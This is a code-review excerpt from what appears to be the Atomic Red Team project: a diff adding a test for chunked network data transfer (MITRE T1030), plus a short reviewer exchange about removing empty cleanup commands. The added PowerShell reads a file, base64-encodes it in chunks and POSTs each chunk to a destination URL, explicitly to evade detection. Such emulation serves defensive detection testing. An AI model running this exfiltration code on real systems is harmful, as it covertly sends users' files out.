atomics/T1030/T1030.yaml

```diff
@@ -31,3 +31,40 @@ atomic_tests:
     cleanup_command: |
       if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
     name: sh
+
+- name: Network-Based Data Transfer in Small Chunks
+  description: "Simulate transferring data over a network in small chunks to evade detection."
+  supported_platforms:
+    - "windows"
+  auto_generated_guid: 9dc4dbee-898c-4237-8484-9f28574b8538
+  input_arguments:
+    source_file_path:
+      description: "Path to the source file to transfer."
+      type: "string"
+      default: "[User specified]"
+    destination_url:
+      description: "URL of the destination server."
+      type: "string"
+      default: "http://example.com"
+    chunk_size:
+      description: "Size of each data chunk (in KB)."
+      type: "integer"
+      default: 1024
+  executor:
+    name: "powershell"
+    elevation_required: false
+    command: |
+      $file = [System.IO.File]::OpenRead(#{source_file_path})
+      $chunkSize = #{chunk_size} * 1KB
+      $buffer = New-Object Byte[] $chunkSize
+  
+      while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+          $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+          Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+      }
+      $file.Close()
+  cleanup_commands:
```

Comment:
please remove the cleanup commands since there aren't any

Reply:
removed Clean up